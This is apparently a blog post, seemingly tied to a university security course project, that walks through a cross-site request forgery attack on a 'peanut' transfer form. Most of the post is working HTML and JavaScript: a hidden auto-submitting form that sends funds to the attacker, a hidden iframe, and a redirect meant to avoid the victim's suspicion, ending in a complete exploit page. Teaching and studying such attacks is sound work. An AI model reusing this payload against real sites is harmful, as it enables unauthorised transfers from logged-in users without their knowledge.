Advertisements
Home > Information Technology, Science, Security > Attack B: Cross Site Request Forgery

Attack B: Cross Site Request Forgery

This attack probably a more suited example for Paypal or EBay. For this example, suppose you have a transfer.php page that looks like this:

<form method=POST name=transferform
  action="/teaching/10WS/Security/material/projects/project2/peanut/transfer.php">
<p>Send <input name=peanuts type=text value="" size=5> peanuts</p>
<p>to <input name=recipient type=text value=""></p>
<input type=submit name=submission value="Send">
</form>

Let’s assume that there is no confirmation when a user transfer an amount of peanuts to other users and let’s also assume that the user has already logged in to the website. The attacker can construct an HTML file to lure the user to click it and send the peanuts to his account.

1. Set up a fake form

In the HTML file, copy paste the form needed to transfer the peanuts with the recipient and peanut input field predefined by the attacker:

<form action="/transfer.php" id="transferform"
    method="post" enctype="application/x-www-form-urlencoded">
    <input type="hidden" name="recipient" value="attacker" />
    <input type="hidden" name="peanuts" value="10" />
    <input type="hidden" name="submission" value="Send" />
 </form>

We set the input field to hidden so the user won’t see anything unnecessary during the request forgery is happening.

2. Set an auto-Submit function and Redirection function

Now, you want your HTML file to process the form automatically on loading of the HTML file and you want to redirect your HTML file as soon as the form has been submitted to the main page to avoid suspicion. Well, the onLoad and iframe will do that for you:

<body onLoad = "breakthrough()">
 <form action="/transfer.php" id="transferform"
    method="post" enctype="application/x-www-form-urlencoded">
    <input type="hidden" name="recipient" value="attacker" />
    <input type="hidden" name="peanuts" value="10" />
    <input type="hidden" name="submission" value="Send" />
 </form>
 <iframe id="form_target" name="form_target" style="visibility: hidden;">
 </iframe>
</body>

3. Create a Javascript function to process the form

Now you have created a onLoad function to automatically process the form to transfer peanuts, now you are ready to construct your Javascript function in the header function:

<script type="text/javascript">
 function breakthrough() {
    var frame = document.getElementById('form_target');
    var form = document.getElementById('transferform');
    form.target = frame.name;
    frame.addEventListener('load', function() {
       window.location = "/index.php";
    }, false);
    form.submit();
 }
 </script>

This script will all the element of the form and put it in the form variable. The frame variable will define the target which it has to send the form to in the form name (transfer.php) and add an onLoad function to redirect the page to index.php once it has done submitting the form via form.submit() function. As soon as the user hit the link to the HTML link, his peanuts will be transfered to the attacker without he has a chance to stop the request. Hence the full code will be:

<!DOCTYPE html>
<html>
 <head>
  <script type="text/javascript">
   function breakthrough() {
    var frame = document.getElementById('form_target');
    var form = document.getElementById('transferform');
    form.target = frame.name;
    frame.addEventListener('load', function() {
      window.location = "/index.php";
    }, false);
    form.submit();
   }
  </script>
 </head>
 <body onLoad = "breakthrough()">
  <form action="/transfer.php" id="transferform"
   method="post" enctype="application/x-www-form-urlencoded">
   <input type="hidden" name="recipient" value="attacker" />
   <input type="hidden" name="peanuts" value="10" />
   <input type="hidden" name="submission" value="Send" />
  </form>
  <iframe id="form_target" name="form_target" style="visibility: hidden;">
  </iframe>
 </body>
</html>
Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: